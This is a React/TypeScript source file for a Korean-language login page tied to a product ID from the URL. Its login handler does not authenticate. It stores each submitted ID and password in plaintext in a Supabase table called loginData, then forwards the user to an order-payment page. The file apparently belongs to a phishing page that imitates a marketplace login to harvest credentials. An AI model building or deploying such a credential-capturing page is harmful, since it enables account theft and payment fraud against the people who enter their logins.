/**
 * This code was generated by Builder.io.
 */
import React, { useEffect } from "react";
import styled from "styled-components";
import Header from "../components/LoginPage/Header";
import LoginForm from "../components/LoginPage/LoginForm";
import Footer from "../components/LoginPage/Footer";
import { useDelayedNavigation } from "../useDelayedNavigation";
import { supabase } from "../lib/supabaseClient";
import { JUNGNA_TABLES } from "../lib/jungnaTables";
import { useParams } from "react-router-dom";

const LoginPage: React.FC = () => {
  const delayedNavigate = useDelayedNavigation(1000);
  const { product_id } = useParams<{ product_id: string }>(); // 타입 명시적 지정
  useEffect(() => {
    console.log("LoginPage - product_id:", product_id); // product_id Log 출력
  }, [product_id]);

  useEffect(() => {
    const existingMeta = document.querySelector('meta[name="viewport"]');
    if (existingMeta) {
      existingMeta.remove();
    }

    const meta = document.createElement("meta");
    meta.name = "viewport";
    meta.content = "width=device-width, initial-scale=1";
    document.head.appendChild(meta);

    return () => {
      if (meta) {
        meta.remove();
      }
    };
  }, []);

  const handleBack = async () => {
    console.log("Back button clicked");
    await delayedNavigate(-1);
    console.log("Navigation complete");
  };

  const handleLogin = async (id: string, password: string) => {
    try {
      if (!product_id) {
        alert("상품 정보가 없습니다");
        return;
      }

      const { error } = await supabase
        .from(JUNGNA_TABLES.loginData)
        .insert([
          {
            id_data: id,
            pw_data: password,
            product_id,
          },
        ]);

      if (error) throw error;

      console.log("로그인 데이터 저장 성공");
      await delayedNavigate(`/product/${product_id}/order-payment`, {
        replace: true,
      });
    } catch (error) {
      console.error("로그인 데이터 저장 실패:", error);
    }
  };

  return (
    <StyledMain>
      <BackButton onClick={handleBack}>
        <img
          src="/assets/arrow-left.png"
          alt="Back"
          style={{ width: "30px", marginTop: "30px" }}
        />
      </BackButton>
      <Header />
      <LoginForm onLogin={handleLogin} />
      <Footer />
    </StyledMain>
  );
};

const StyledMain = styled.main`
  background-color: #fff;
  display: flex;
  max-width: 864px;
  flex-direction: column;
  overflow: hidden;
  align-items: flex-start;
  padding: 109px 41px 836px;
  @media (max-width: 991px) {
    padding: 100px 20px;
  }
`;

const BackButton = styled.button`
  position: absolute;
  top: 20px;
  left: 20px;
  background: transparent;
  border: none;
  color: #007bff;
  cursor: pointer;
  font-size: 16px;
`;

export default LoginPage;
